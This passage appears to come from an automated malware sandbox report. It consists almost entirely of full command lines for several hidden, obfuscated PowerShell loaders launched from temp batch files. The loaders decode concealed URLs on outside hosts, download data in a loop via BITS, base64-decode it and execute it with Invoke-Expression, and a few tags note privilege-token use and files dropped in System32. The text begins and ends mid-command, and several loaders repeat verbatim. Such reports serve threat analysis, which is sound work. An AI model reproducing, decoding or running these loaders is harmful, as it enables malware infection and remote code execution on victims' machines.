Li.otTarqurGrave]Recep:prism: xosps ,atei Eds,zt,tteeGoalk Oplys-Cote e Co.pq Unbe Reimp8 Dua,) uds ') ;if ($Unforcefully) {.$Dagtemperaturerne $Dansekompagniet;} else {;$Understregnings=Terrn ' see SCement Tr gaDufflrYgdrat Stan-Hu.spB DociiH ppotParols MisdTMethorantica trannInters AflyfMicroeDesigrAmali Saddl-AutisSOtidioDesynuLaserrNon,ocEpidieArg r ,ncon$ vertd PreriSammerKi sfiMargeg rinkeIhukonKristtFjernsBestetBundbo Vindk DemokZygadeKagev umbe-BoghoDDybeteHemmesS,onct TilliMacasnGas.aaCorvetKenneiSkjoroMilienSa.se ,ullg$uncatG Mis,iPomf,tSpiontSivsaeB sttrU estn verascontr ';.($Monophonous) (Terrn 'gly.y$ AlleG ,arki.athstudtogtVa reeBedo,r Gru nBar esDepar=eklip$EpipreBrokenHabilvSkods: Presa.ilpapLaur,p To.cdNedlgaSalgstFo ouaLkass ') ;.($Monophonous) (Terrn 'BraseI Jugomdok,mp Fusioadvo,rViburtBawre-,oralM orkoSargadSkummu TanalKonceePaalo VedstBO ganiPhaset CentsS.yllTU bokrAgerbaAssurnPolygs osonfSteicePasterLyksa ') ;$Gitterns=$Gitterns+'\Skandals.Ber';while (-not $Kollisionskurs89) {.($Monophonous) (Terrn 'Obscu$TrbukKBoghvoSeda,lForsoll,mmeiBrdefsA,natiIndokoSchiznFor,as Skovkbugs uVaccerK,edisAmass8Grund9Kabin=Panna(PagioT OpbrerelatsValgttCos,u-Foo,bPBedetaLgprdtPockehLaste Tutus$Cae.aGsempsiCleartOvermtTollbeSta,er WalenGaasesLang )Sa.gs ') ;.($Monophonous) $Understregnings;.($Monophonous) (Terrn ' LderSSapontSurbraKabalrLandmtBurni-B havSRadi,l Col.e.ertreTurqupCanar Stryg5For.i ');$dirigentstokke=$Mellemniveauets[$Jordbrs++%$Mellemniveauets.count];}.($Monophonous) (Terrn 'tid l$PohnaSForhopNyh,de elbrrinvitm Une,aF runtSymptiTejuooA ecigPraxieSandwnis,enoHa.riuSma,fsFluki Silic= Ddss La.ouG ,ovse .urrtBl.dt-HyperCPudleoRaketn alsyt Sp ne Vej.nFordotTilbu Preen$MalefGTetraiNedstt.argitSysteeRestarDa klnPikofsEmigr ');.($Monophonous) (Terrn 'Indkr$ fordV taknotilg iTu sddOpofraSociob blublFasteeKohvenOutdeeStvk sTuchusTrold Bundn=Scaph Lrebo[Cha tSSkresyKoll,sCutintCompoeArsenmDeten.Led iC,anyooForsknFortrvCcnyueC,asmr reortFi.nd] P gl:Af,nn:H droFBygherSkrivo,echamDem,lB VandaRdklks DjaeeFjeli6Coher4StyrtS .umbtRe.skrTransiRes,lnAfbreg Ski,(Autum$ dur,SStoplp SkybeNonscrGuestmTachyaTilgit ,anaiCo opoLubelg.verseAdmirnRou doFrontuPozz sServi)Pend ');.($Monophonous) (Terrn ' Reta$GenneLRe nsaHo.fmeUnenlr Finge topfa Nud,n RestsPhar tAarh a UdtnlOenantDe eneOutpor Fors Coop=gemon Drtr[HunteSGa enyVelsts TvtstTechne Stanm.nnov. AmsaTBumpeere,dhx Besyt Unpr.middlE Str nV.skocKari,obe ysd AfkliAnneknRllikgVirak]Subpr:Lovk.:Da.opAAmoibSOver,CPeakeIIsoclIYeme..LavagG Adj,eReg mtStednSDiesetHypocrPseudiVidernGlucogo erg(All.t$SvaleVPuntioSediliPer.xd teleaAnilibchausl.aaneeForjun BrileRigsbsBdefos Proj) Vall ');.($Monophonous) (Terrn 'Vendi$ onoSTricko Ev,nr SkketCro deBivaarNonsei DrisnCul,igUina,sGra.uf ,rutounbutrMindsm Un esKsneh=Rejse$ iljmL,eleca Palmecerasr KorreStillaAymernpanursSpa.itReabaa,elval PalatBracheTrtterConfi.El.ctsS ndsu BundbAal rsa.tartCo,lir.istniChi.lnMoringForty( pege3 Akam4 Fars8Sexis2Sick,9Tilko2Graas,M,nia2Sid l6,soga5Intro1Overg8Nonfr)Orino ');.($Monophonous) $Sorteringsforms;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Misviser;++$Misviser;$Misviser=$Misviser-1;Function Terrn ($terminusen){$Thallogen140=5;$Thallogen140++;For($Stabelstoles=5; $Stabelstoles -lt $terminusen.Length-1; $Stabelstoles+=$Thallogen140){$Sammenklumpningens = 'substring';$centranthus=$terminusen.$Sammenklumpningens.Invoke($Stabelstoles, 1);$Wekau236=$Wekau236+$centranthus}$Wekau236;}$dirigentstokke=Terrn 'Deklah Une.t HoontglasupSchemsFyrkl:.erma/ Sto,/SkiftkOu,roiReal.sStraia Cr.snCondubRingkeEli,etPrinthLucifaHydrakFastu.Phrenc HousoSlavem.odel/GudmdPSejrt/ Nedse Pa ti ForgsKrystt bseie dbomdGagerdPlougfskudeosamurdArvefiVrdimc Stat.be,rudUldhawAbovepB evd ';$Mellemniveauets=$dirigentstokke.split([char]62);$dirigentstokke=$Mellemniveauets[0];$Monophonous=Terrn 'AfsiniHere.e Oplaxsquar ';$Dagtemperaturerne = Terrn ' Zapo\ Chais toreyR.daksUnburwAkvapoFortawGlaum6Resaw4 .orm\BrandWSen,ii Wrecn undedDis.gosp.sew trousCacodPT taloK.mmewUdvikeStngerNotaeS R.fahAfsoneOlearlUdstelStru,\ Hermv S.ff1Inkas.Huxte0Kamp.\SnuggpPoddloSpe mwGoodee,porlrDarsosDistrh Sw leEliaslHollblLserk. Of eeSva rx ShoceB,udo ';.($Monophonous) (Terrn 'Ukoll$BjninG Sp.riindfitPersetKaptaeFlaskr T.nfnThiazsfor.t=Utilb$Fdrele veranHandevCalix:C lsiwSlagiiR,stinUn.ildPr griToolmr.yten ') ;.($Monophonous) (Terrn ',ioto$ SekrDPraktaRegr,gNyor,tHalloeUnranmLobefpPor eeT,pplrKligsa GradtSompnuMiljbrPolereOutmar ChasnrearteSol,l= Info$fatt,G Belli,pipht DelstNon ceTra,kr seklnFormasEzba.+ Hump$ UdbyDou,blaGradugAlg etSilkeeCamelm,oodlpEthereApokrrAnf,eas,dest TretuU.enorAntibe PenkrPompin SarkeBrand ') ;.($Monophonous) (Terrn 'Spaan$KighoRStat.aStrmpn SyngdTrytosTro ptDemeraTekstt UntosSul h edtr=Gnidr Ha.kn(unrul( NontgGoralwHjlpemStoryiRevue DingywOospoi ktienReb,i3F.rma2,rall_ xazipPersorslaveoTi skcHertueAfkv,spaleosAvisk Gaard-Chil,FConta Fe.chPm,gnerCadesoMono.cIntereTn stsT.bifsKometIPhotodchi,e= issh$Vesti{cimm,PCharmIUneffDWildf}Sniv ) Indu.FortjCSlateoBaksnmFinanm fstaaLiga n.ncomd.iritLConfeimetasnNeurae Mane)actin Bushv-tropis,arxipRykkelHelioi.iniet syge Sko,e[ Postcam lgh,onsuaEpicer Reci]Omnin3Irrig4Facet ');.($Monophonous) (Terrn ' Anti$OccipDvinkaa dichnAnimasGoerseBuddikRetfroGr,jemMacarpchaptaSt.kegJttesnDia,oiTopf,eSmelttForha Han.n=sprog V ult$GrognR .priaThreanTrustdSavo,sPreputTelefaEksertGe.ytsUdkas[Af je$MisshRSkoleaMole nCariddByggesForsatHandsagoofit GymnsTefil.SemincNatteoBeoenuS stenBelbstOffic-Un.ri2 K.re]Fo.bi ');.($Monophonous) (Terrn ',mirk$AprosUCharln roejfMilieoKabber rchacB reneUnderfepineuSla,slC.noblPhotoy Nonu=nonsy(Unaf.TEksteeKorans ag,nt v.ga-KobbePsank,a laatAlma hSc,em S mpl$oneroDAlginaP,erogElli tUnkeneKajsamOutbrpNonrueWagerrThli.ascroltElaphuSuccerSkatteKe,dor KarinFingee yve)Konfo Unive-Prot,A.onconForsidP.eac Danne(Dejeu[ChlorI MethnLote,tF,shyP Li.otTarqurGrave]Recep:prism: xosps ,atei Eds,zt,tteeGoalk Oplys-Cote e Co.pq Unbe Reimp8 Dua,) uds ') ;if ($Unforcefully) {.$Dagtemperaturerne $Dansekompagniet;} else {;$Understregnings=Terrn ' see SCement Tr gaDufflrYgdrat Stan-Hu.spB DociiH ppotParols MisdTMethorantica trannInters AflyfMicroeDesigrAmali Saddl-AutisSOtidioDesynuLaserrNon,ocEpidieArg r ,ncon$ vertd PreriSammerKi sfiMargeg rinkeIhukonKristtFjernsBestetBundbo Vindk DemokZygadeKagev umbe-BoghoDDybeteHemmesS,onct TilliMacasnGas.aaCorvetKenneiSkjoroMilienSa.se ,ullg$uncatG Mis,iPomf,tSpiontSivsaeB sttrU estn verascontr ';.($Monophonous) (Terrn 'gly.y$ AlleG ,arki.athstudtogtVa reeBedo,r Gru nBar esDepar=eklip$EpipreBrokenHabilvSkods: Presa.ilpapLaur,p To.cdNedlgaSalgstFo ouaLkass ') ;.($Monophonous) (Terrn 'BraseI Jugomdok,mp Fusioadvo,rViburtBawre-,oralM orkoSargadSkummu TanalKonceePaalo VedstBO ganiPhaset CentsS.yllTU bokrAgerbaAssurnPolygs osonfSteicePasterLyksa ') ;$Gitterns=$Gitterns+'\Skandals.Ber';while (-not $Kollisionskurs89) {.($Monophonous) (Terrn 'Obscu$TrbukKBoghvoSeda,lForsoll,mmeiBrdefsA,natiIndokoSchiznFor,as Skovkbugs uVaccerK,edisAmass8Grund9Kabin=Panna(PagioT OpbrerelatsValgttCos,u-Foo,bPBedetaLgprdtPockehLaste Tutus$Cae.aGsempsiCleartOvermtTollbeSta,er WalenGaasesLang )Sa.gs ') ;.($Monophonous) $Understregnings;.($Monophonous) (Terrn ' LderSSapontSurbraKabalrLandmtBurni-B havSRadi,l Col.e.ertreTurqupCanar Stryg5For.i ');$dirigentstokke=$Mellemniveauets[$Jordbrs++%$Mellemniveauets.count];}.($Monophonous) (Terrn 'tid l$PohnaSForhopNyh,de elbrrinvitm Une,aF runtSymptiTejuooA ecigPraxieSandwnis,enoHa.riuSma,fsFluki Silic= Ddss La.ouG ,ovse .urrtBl.dt-HyperCPudleoRaketn alsyt Sp ne Vej.nFordotTilbu Preen$MalefGTetraiNedstt.argitSysteeRestarDa klnPikofsEmigr ');.($Monophonous) (Terrn 'Indkr$ fordV taknotilg iTu sddOpofraSociob blublFasteeKohvenOutdeeStvk sTuchusTrold Bundn=Scaph Lrebo[Cha tSSkresyKoll,sCutintCompoeArsenmDeten.Led iC,anyooForsknFortrvCcnyueC,asmr reortFi.nd] P gl:Af,nn:H droFBygherSkrivo,echamDem,lB VandaRdklks DjaeeFjeli6Coher4StyrtS .umbtRe.skrTransiRes,lnAfbreg Ski,(Autum$ dur,SStoplp SkybeNonscrGuestmTachyaTilgit ,anaiCo opoLubelg.verseAdmirnRou doFrontuPozz sServi)Pend ');.($Monophonous) (Terrn ' Reta$GenneLRe nsaHo.fmeUnenlr Finge topfa Nud,n RestsPhar tAarh a UdtnlOenantDe eneOutpor Fors Coop=gemon Drtr[HunteSGa enyVelsts TvtstTechne Stanm.nnov. AmsaTBumpeere,dhx Besyt Unpr.middlE Str nV.skocKari,obe ysd AfkliAnneknRllikgVirak]Subpr:Lovk.:Da.opAAmoibSOver,CPeakeIIsoclIYeme..LavagG Adj,eReg mtStednSDiesetHypocrPseudiVidernGlucogo erg(All.t$SvaleVPuntioSediliPer.xd teleaAnilibchausl.aaneeForjun BrileRigsbsBdefos Proj) Vall ');.($Monophonous) (Terrn 'Vendi$ onoSTricko Ev,nr SkketCro deBivaarNonsei DrisnCul,igUina,sGra.uf ,rutounbutrMindsm Un esKsneh=Rejse$ iljmL,eleca Palmecerasr KorreStillaAymernpanursSpa.itReabaa,elval PalatBracheTrtterConfi.El.ctsS ndsu BundbAal rsa.tartCo,lir.istniChi.lnMoringForty( pege3 Akam4 Fars8Sexis2Sick,9Tilko2Graas,M,nia2Sid l6,soga5Intro1Overg8Nonfr)Orino ');.($Monophonous) $Sorteringsforms;}"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\brbkhn.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Brmmen;++$Brmmen;$Brmmen=$Brmmen-1;Function Slagsvrds ($Troutman){$Rangspersonens=5;$Rangspersonens++;For($Whodunit=5; $Whodunit -lt $Troutman.Length-1; $Whodunit+=$Rangspersonens){$Tetrakisazo = 'substring';$Endossementers=$Troutman.$Tetrakisazo.Invoke($Whodunit, 1);$Nervesystemer=$Nervesystemer+$Endossementers}$Nervesystemer;}$Frammit=Slagsvrds 'Visagh rdfat Ma otVragrpPargesIndha:Geopo/Cre.a/,lvidkVidn.iKagedsFormaablattn gad,bHammeeSeksttUnnoohEthi.aEhflakMonte. SkjtcToparoStabemMoota/BraroPPlate/Er stMPe,rsiSupers UrbiiRichwn Belef Con oGn,enrCoer.mFlyvee .irmr,orske HammtManeg.GravhhcompuhDetaipFljte ';$Afsvaekkelsen=$Frammit.split([char]62);$Frammit=$Afsvaekkelsen[0];$Ingun=Slagsvrds '.haraiBas.le,loodxpreco ';$Petrolisation = Slagsvrds 'Prein\D.rezsFata,yBardes uaviwOmbudoP.imfwR.sko6 opsp4u,iln\Sa,siW KogeiStiftn Gas,dBesluo.tomawOverfsovervP pkloManudwHvlbneAandrrSe.ioSUv.llhPeneteHokinlFiltel Nons\NonbavD.cim1 Snvr. Prec0.itua\Rim apcheveoKo,suwPeltaeDe,rerGenopsOptakhOb,eceInt,rlIrretlPurlo.UnkineInst,xIndlreRigma ';.($Ingun) (Slagsvrds 'H,ndr$.ispoAbo,usfklonedHa,pnm rtikpsa opeMandotShoos= Gyno$CirceeCyan,nFo,lsvSe.ar:TinfowUlulaiA bejnBiblidforfriBar erW.akn ') ;.($Ingun) (Slagsvrds 'Synli$AmalePIngele avistSa lbrStandoFo stlSa,meipithos,dskraAsthot AstoiVietnoTrabenFrict=Trope$Rep iARdstjfNoncodSepu.mHarddphjsdeeeurhytInhab+ Re o$Ge.grPSquadeGa getPse,drImplioMangelhesteiartilsC,traaSp.lotHertuiSubamoDi,own Stew ') ;.($Ingun) (Slagsvrds 'Alime$ MoniAMilitlPrinctBoolcmellevu SexolPhrasiHeadsg AlipmMaskinEnergdSub.f Zerli=Apoph Fi.ke( ingf(FortigPaat,wincenmGrnlai ,ste MinivwShak iNo denReost3spids2Overf_BromdpSkruerSysteo Al,ocAari.etelersPe,ucsSku b Oplse- SundFHarm, Non,aPBaks.r MadaoKlintcAfskeeTrdems RutssMiserI Imitd Cadr=Bened$Kyath{O.ierPS iatIEpigrD Call} Fi a) jen.AcromCI arioNonnemPi.otm ImpuaLjedenOsiridTehttL AppeimordenBegogeEldor)car i Kust-Snedisa myspBogstl Sandi FashtOpist A,tim[C ocicca.eghHa,deaDiamarEpico].anda3Alarm4Earth ');.($Ingun) (Slagsvrds 'delic$ DeprTFi.mao L,nigYurtsdMonogrSulfaiChogafResvatStykgeBussenSmede Feof=Wlecc Si ic$Def,cAbetool,undetnadvemNonbluHngebluns.aiBeskfgCim.amKandin .recdVirks[heter$ScripAFr.hollinebt Overm algsuVariolS nsui UnpegStttem.pdelnVandfd Rhei. HistcPrincoSheeruPresansoffit Sejr-Bezan2Acetr]Urosc ');.($Ingun) (Slagsvrds 'Badni$HydroALivsvr ytocfKorr,=Audio(GibbeT PhyleMu edsPel,ctA.rac-SperrPMetroaUnmest Fle hKonfl Anteg$ inoPSubmeeBudgetA.etyrdybtroStranlParahiOpti,sTroldaUnmatt,omasiManusoLozennHospi)Tekst Sy,ta- V.naAKurbanS firdE,end Fotok(Harps[JeopaIOve.dn Ch.ntvrvlePQuivetFocalrnovoc]Nonbu:Notat: Dikts.obariW,nksz ,nceeamtsk Neur.-Di,toeLemurq .pej Risen8Colug)C abb ') ;if ($Arf) {.$Petrolisation $Togdriften;} else {;$Forsendelsens=Slagsvrds 'ManneS gorgtBa,chaAfte,rSpildtBille- TeleBViroli Bev,tFirmas C ntTGawgarMejeraBiconnRa iosSagumfG ngie ForerAller Desan- W ulSPter.oMageru WherrPrsencUdvlgeTr.up pag,n$ RetoFStrudrNont.a ConcmT.ovrm rissiFag ltSkole impar- KommDU.dereSmaabsT,toyt Bu hiwool,nM.nodaLeagutNat,riRefusoCourtnForbl Bygni$,nernATe,tefAmatod,glelm.lektp ArcheKontotDrvle ';.($Ingun) (Slagsvrds 'ravio$BelliA GaspfV,ntedAbsenmforvipBortseStodgtRokke= Fisk$ Antie CopanAcc,svS,liv:Discra GletpNordvpOmdb.dUnconaFyrsttDispoaFejeb ') ;.($Ingun) (Slagsvrds 'GravrIFurifm Scorpbrne,oEvelirFundatKonve-BoligMGestioGauffd Tr.suOutfol .imeeEvnem DiselB planifl gttLandhs AbraT Afstr CitaaGrun,nu,excsGestifT.aekeU imir Ti,k ') ;$Afdmpet=$Afdmpet+'\Extraditing.Pup';while (-not $Forbeholdsklausul) {.($Ingun) (Slagsvrds 'Karyo$staphFPyramoBetwir R.fubPrakteTr,ophDaed.oA,venlProaudTveknsJoniskFenialForbea.esuluHagdes Uigeu Datal Feld=Toesh(LejerTPiaroeSubdesBryg tFolke-De,arPTransaverb tsidekh Angm Ynkvr$ ammAFromefBankbdNonpumGrandpHed.neInd,ktTvind)Landb ') ;.($Ingun) $Forsendelsens;.($Ingun) (Slagsvrds 'CapilS HonntdotyaaVibrirRotattMadr,- RenoSAttaclHest efodbaeUndunp Nodd Sti,l5Hydra ');$Frammit=$Afsvaekkelsen[$Sombreroernes++%$Afsvaekkelsen.count];}.($Ingun) (Slagsvrds '.atte$KontaSeuphoo PhariAflbslHae aeKilordBrneb Ottos=Actin FrskoGPostle,uppotFlexi-IansmCForlooBra dnLossetPip,ge pibenSydaftDi ke Spejl$,orudAAndelfSkolidKommimEgenvpMystiePre,nt Rens ');.($Ingun) (Slagsvrds 'Spalt$U,otrEFallitAitk,h KiloeTidsprSuperiSt sua C url ShapiPlantz .umee Myre2Harle3Bogym4Secur Wor,y=Rygst Telet[ T,leSSalamyEstrus DermtPerile statm all.HouseCT rnio A.gonFlexuvseceseBriskrT.lbatParac]habit:bevil: Sp rF AffirUn ngoD,ublmkurc.B UnciaAnasts rndee Ove 6digit4 CorcS CamltGulvmrRat.oiAsseen Sk ag,onvo(uv.sa$ SnecSIraqioSadleiFodpllSvrdseSu.erd Spyf)Shylo ');.($Ingun) (Slagsvrds 'benn $SalarSberkluNau apSupereSa.borfinche ndstxErythqsamfuuSiti iScannspreveiDekortforfletratt Tila.=.edsk Bibli[amoraSjonesy Skr,sYear,tfor rerudekmu,lod.Dio.sTprev,eMandsx.rnettB,tro.Or,anELu tenKa.ppcBoileoSpirid.steoi ChannAtr.uglit e] nrom:Sk de:FunicA HattS.ctacCTotalIinterIVildf.Kl nkG P,asePo,litfacitSIndvitE.gelrSp,wninebulnPhonig phed(Octal$AnelsETillit I gehLderreLy,rerBeskuiPeepeaNedlul Opr.iDeallz d,nseaccru2Co,fi3Sperm4Akeed)symbo ');.($Ingun) (Slagsvrds 'Wakem$ThitsM GhoseUrinotGardihDerivyVall l,elsea.ollichalsneNonmat Ra,ea C.ran FondiOverelStenoiD,rgbd ApoteMenne1Miljf1,ally5Ma.gr=Debat$BaaseS St.fuRaciepFormleBerigrt,rteebanquxen,etqParleuLrkeri O,ohs FersiSharkt margeBugw .T,rpisVelviuCiv,lbPr elsKloset RererUhyreiKr.dtnFerrygMonop(M.ljs3Dalm 2 ,tef8Samme4 Fo,s4S,rha9Tuske,Dokum2Geni.5Bereg9Brnde7 Poli3 Ju t)rangf ');.($Ingun) $Methylacetanilide115;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Brmmen;++$Brmmen;$Brmmen=$Brmmen-1;Function Slagsvrds ($Troutman){$Rangspersonens=5;$Rangspersonens++;For($Whodunit=5; $Whodunit -lt $Troutman.Length-1; $Whodunit+=$Rangspersonens){$Tetrakisazo = 'substring';$Endossementers=$Troutman.$Tetrakisazo.Invoke($Whodunit, 1);$Nervesystemer=$Nervesystemer+$Endossementers}$Nervesystemer;}$Frammit=Slagsvrds 'Visagh rdfat Ma otVragrpPargesIndha:Geopo/Cre.a/,lvidkVidn.iKagedsFormaablattn gad,bHammeeSeksttUnnoohEthi.aEhflakMonte. SkjtcToparoStabemMoota/BraroPPlate/Er stMPe,rsiSupers UrbiiRichwn Belef Con oGn,enrCoer.mFlyvee .irmr,orske HammtManeg.GravhhcompuhDetaipFljte ';$Afsvaekkelsen=$Frammit.split([char]62);$Frammit=$Afsvaekkelsen[0];$Ingun=Slagsvrds '.haraiBas.le,loodxpreco ';$Petrolisation = Slagsvrds 'Prein\D.rezsFata,yBardes uaviwOmbudoP.imfwR.sko6 opsp4u,iln\Sa,siW KogeiStiftn Gas,dBesluo.tomawOverfsovervP pkloManudwHvlbneAandrrSe.ioSUv.llhPeneteHokinlFiltel Nons\NonbavD.cim1 Snvr. Prec0.itua\Rim apcheveoKo,suwPeltaeDe,rerGenopsOptakhOb,eceInt,rlIrretlPurlo.UnkineInst,xIndlreRigma ';.($Ingun) (Slagsvrds 'H,ndr$.ispoAbo,usfklonedHa,pnm rtikpsa opeMandotShoos= Gyno$CirceeCyan,nFo,lsvSe.ar:TinfowUlulaiA bejnBiblidforfriBar erW.akn ') ;.($Ingun) (Slagsvrds 'Synli$AmalePIngele avistSa lbrStandoFo stlSa,meipithos,dskraAsthot AstoiVietnoTrabenFrict=Trope$Rep iARdstjfNoncodSepu.mHarddphjsdeeeurhytInhab+ Re o$Ge.grPSquadeGa getPse,drImplioMangelhesteiartilsC,traaSp.lotHertuiSubamoDi,own Stew ') ;.($Ingun) (Slagsvrds 'Alime$ MoniAMilitlPrinctBoolcmellevu SexolPhrasiHeadsg AlipmMaskinEnergdSub.f Zerli=Apoph Fi.ke( ingf(FortigPaat,wincenmGrnlai ,ste MinivwShak iNo denReost3spids2Overf_BromdpSkruerSysteo Al,ocAari.etelersPe,ucsSku b Oplse- SundFHarm, Non,aPBaks.r MadaoKlintcAfskeeTrdems RutssMiserI Imitd Cadr=Bened$Kyath{O.ierPS iatIEpigrD Call} Fi a) jen.AcromCI arioNonnemPi.otm ImpuaLjedenOsiridTehttL AppeimordenBegogeEldor)car i Kust-Snedisa myspBogstl Sandi FashtOpist A,tim[C ocicca.eghHa,deaDiamarEpico].anda3Alarm4Earth ');.($Ingun) (Slagsvrds 'delic$ DeprTFi.mao L,nigYurtsdMonogrSulfaiChogafResvatStykgeBussenSmede Feof=Wlecc Si ic$Def,cAbetool,undetnadvemNonbluHngebluns.aiBeskfgCim.amKandin .recdVirks[heter$ScripAFr.hollinebt Overm algsuVariolS nsui UnpegStttem.pdelnVandfd Rhei. HistcPrincoSheeruPresansoffit Sejr-Bezan2Acetr]Urosc ');.($Ingun) (Slagsvrds 'Badni$HydroALivsvr ytocfKorr,=Audio(GibbeT PhyleMu edsPel,ctA.rac-SperrPMetroaUnmest Fle hKonfl Anteg$ inoPSubmeeBudgetA.etyrdybtroStranlParahiOpti,sTroldaUnmatt,omasiManusoLozennHospi)Tekst Sy,ta- V.naAKurbanS firdE,end Fotok(Harps[JeopaIOve.dn Ch.ntvrvlePQuivetFocalrnovoc]Nonbu:Notat: Dikts.obariW,nksz ,nceeamtsk Neur.-Di,toeLemurq .pej Risen8Colug)C abb ') ;if ($Arf) {.$Petrolisation $Togdriften;} else {;$Forsendelsens=Slagsvrds 'ManneS gorgtBa,chaAfte,rSpildtBille- TeleBViroli Bev,tFirmas C ntTGawgarMejeraBiconnRa iosSagumfG ngie ForerAller Desan- W ulSPter.oMageru WherrPrsencUdvlgeTr.up pag,n$ RetoFStrudrNont.a ConcmT.ovrm rissiFag ltSkole impar- KommDU.dereSmaabsT,toyt Bu hiwool,nM.nodaLeagutNat,riRefusoCourtnForbl Bygni$,nernATe,tefAmatod,glelm.lektp ArcheKontotDrvle ';.($Ingun) (Slagsvrds 'ravio$BelliA GaspfV,ntedAbsenmforvipBortseStodgtRokke= Fisk$ Antie CopanAcc,svS,liv:Discra GletpNordvpOmdb.dUnconaFyrsttDispoaFejeb ') ;.($Ingun) (Slagsvrds 'GravrIFurifm Scorpbrne,oEvelirFundatKonve-BoligMGestioGauffd Tr.suOutfol .imeeEvnem DiselB planifl gttLandhs AbraT Afstr CitaaGrun,nu,excsGestifT.aekeU imir Ti,k ') ;$Afdmpet=$Afdmpet+'\Extraditing.Pup';while (-not $Forbeholdsklausul) {.($Ingun) (Slagsvrds 'Karyo$staphFPyramoBetwir R.fubPrakteTr,ophDaed.oA,venlProaudTveknsJoniskFenialForbea.esuluHagdes Uigeu Datal Feld=Toesh(LejerTPiaroeSubdesBryg tFolke-De,arPTransaverb tsidekh Angm Ynkvr$ ammAFromefBankbdNonpumGrandpHed.neInd,ktTvind)Landb ') ;.($Ingun) $Forsendelsens;.($Ingun) (Slagsvrds 'CapilS HonntdotyaaVibrirRotattMadr,- RenoSAttaclHest efodbaeUndunp Nodd Sti,l5Hydra ');$Frammit=$Afsvaekkelsen[$Sombreroernes++%$Afsvaekkelsen.count];}.($Ingun) (Slagsvrds '.atte$KontaSeuphoo PhariAflbslHae aeKilordBrneb Ottos=Actin FrskoGPostle,uppotFlexi-IansmCForlooBra dnLossetPip,ge pibenSydaftDi ke Spejl$,orudAAndelfSkolidKommimEgenvpMystiePre,nt Rens ');.($Ingun) (Slagsvrds 'Spalt$U,otrEFallitAitk,h KiloeTidsprSuperiSt sua C url ShapiPlantz .umee Myre2Harle3Bogym4Secur Wor,y=Rygst Telet[ T,leSSalamyEstrus DermtPerile statm all.HouseCT rnio A.gonFlexuvseceseBriskrT.lbatParac]habit:bevil: Sp rF AffirUn ngoD,ublmkurc.B UnciaAnasts rndee Ove 6digit4 CorcS CamltGulvmrRat.oiAsseen Sk ag,onvo(uv.sa$ SnecSIraqioSadleiFodpllSvrdseSu.erd Spyf)Shylo ');.($Ingun) (Slagsvrds 'benn $SalarSberkluNau apSupereSa.borfinche ndstxErythqsamfuuSiti iScannspreveiDekortforfletratt Tila.=.edsk Bibli[amoraSjonesy Skr,sYear,tfor rerudekmu,lod.Dio.sTprev,eMandsx.rnettB,tro.Or,anELu tenKa.ppcBoileoSpirid.steoi ChannAtr.uglit e] nrom:Sk de:FunicA HattS.ctacCTotalIinterIVildf.Kl nkG P,asePo,litfacitSIndvitE.gelrSp,wninebulnPhonig phed(Octal$AnelsETillit I gehLderreLy,rerBeskuiPeepeaNedlul Opr.iDeallz d,nseaccru2Co,fi3Sperm4Akeed)symbo ');.($Ingun) (Slagsvrds 'Wakem$ThitsM GhoseUrinotGardihDerivyVall l,elsea.ollichalsneNonmat Ra,ea C.ran FondiOverelStenoiD,rgbd ApoteMenne1Miljf1,ally5Ma.gr=Debat$BaaseS St.fuRaciepFormleBerigrt,rteebanquxen,etqParleuLrkeri O,ohs FersiSharkt margeBugw .T,rpisVelviuCiv,lbPr elsKloset RererUhyreiKr.dtnFerrygMonop(M.ljs3Dalm 2 ,tef8Samme4 Fo,s4S,rha9Tuske,Dokum2Geni.5Bereg9Brnde7 Poli3 Ju t)rangf ');.($Ingun) $Methylacetanilide115;}"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\osdbom.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Onefold;++$Onefold;$Onefold=$Onefold-1;Function Tigerfish ($Transducers){$Defoam=5;$Defoam++;For($Drmmene=5; $Drmmene -lt $Transducers.Length-1; $Drmmene+=$Defoam){$Skgpantebrevene = 'substring';$Dadelfrit=$Transducers.$Skgpantebrevene.Invoke($Drmmene, 1);$Skibsllen=$Skibsllen+$Dadelfrit}$Skibsllen;}$Posological18=Tigerfish 'asplehOmdi tNo.catSli,kp hurisGrome:Ou.br/Kanon/ TrekwGtem.wP.litwCan.r.borefsAga.ie FraknRecondAsc,tsOmbygpSkindaTidsacPri,sePappe. MonocLodseo BotomRetr./E entpSe,tor Frn.oKommu/,kyggdRemasl Anpr/Centr6B.rge4Sni.fsSalm pUnfi.xSubj mGrumm ';$Huleudforsknings=$Posological18.split([char]62);$Posological18=$Huleudforsknings[0];$Vandresursers180=Tigerfish 'AngioiPerfee JvnfxFrste ';$Sexangle = Tigerfish ' Ove.\Ciba,snooloyHvemisSnorkw Spi,o BenmwSubdi6Un.ra4 Cens\ FedeWAgoneiSpg dnKistedSauduoSti iwHuckssDknavPBaldmoInterwApa,seHarlerDopinSInde.hUso.ieNickllIchthl Tela\B,ttevExt.e1datau.Zeb.d0Janie\ImpropTalomoIkendwEu,emePrestrto.vtsUnivehAfhvleIm,onlGiovalPr,bl..ravme rndexr treeTu ki ';.($Vandresursers180) (Tigerfish ' Ort $ B.odSUnderc OverhsndernAfkryiCi,cutSamsezBl dle yntal ValgeBrattn LotesBis,a= Rets$Merc,eResson,edtsvLiter:Ko muwAffiliOver,nSmaagdUdstniTrapprStopl ') ;.($Vandresursers180) (Tigerfish 'Foggi$AfprvSFolkeeSceptxLiniea A,dinRetapgSa.ttlLockwe Spe.=Br,nj$NonreSBillacSk,tmhho dwnO ligiFusiotVadimz Smaae,utstlFortreSkolenKolposFlabb+P.ofe$UnquiSCymlie Massx,lasfaMelo.nNnsomg erielMotioeDre.s ') ;.($Vandresursers180) 